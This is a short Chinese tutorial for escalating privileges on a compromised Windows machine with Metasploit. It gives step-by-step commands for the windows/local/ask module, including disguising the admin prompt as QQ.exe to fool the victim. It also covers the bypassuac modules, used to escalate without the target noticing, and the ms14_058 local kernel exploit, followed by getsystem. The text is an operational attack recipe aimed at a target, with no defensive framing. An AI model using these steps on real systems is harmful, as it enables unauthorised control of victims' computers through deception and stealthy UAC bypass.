介绍:
使用: Exploit/windows/local/ask 该命令会在目标机器上弹出需要来自管理员权限的对话框,对方点击‘是’则可将程序权限提至最高级别并未绕过UAC
1.拿到session
后将session
放入后台
2.执行 use exploit windows/local/ask
使用ask模块
3.在ask
模块中首先设置你的session会话的ID
set session id
4.ask
模块中也可以设置弹出框的名字表示哪个应用需要来自管理员权限
set filename QQ.exe
5.其他的无需设置直接发起攻击exploit
目标情况:
如过对方选择“是” 那么会生成一个新的session
对话 如果 对方选择“否”那么该攻击会在一段时间显示超时
getsystem
命令进行提权上面的提权操作附有交互性,对于警惕性很高的人来说一般不会轻易的点击"是"
下面我们使用一种在对方不知不觉的情况下进行UAC绕过
来进行权限的提升。
模块:
Exploit/windows/local/bypassuac
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs
我们使用bypassuac
模块进行提权
1.同上面第一步操作
2.执行 use exploit/windows/local/bypassuac”进
使用bypassuac模块
3.设置你的session会话的ID
set session id
4.直接发起攻击exploit
5.进入新建的session
中执行getsystem
进行提权
模块:Exploit/windows/local/ms14_058_track_popup_menu
1.执行 use exploit/windows/local/ms14_058_track_popup_menu
2.set session id
3.执行 exploit
即可提升权限本地漏洞提权
注:该漏洞适用于x86机器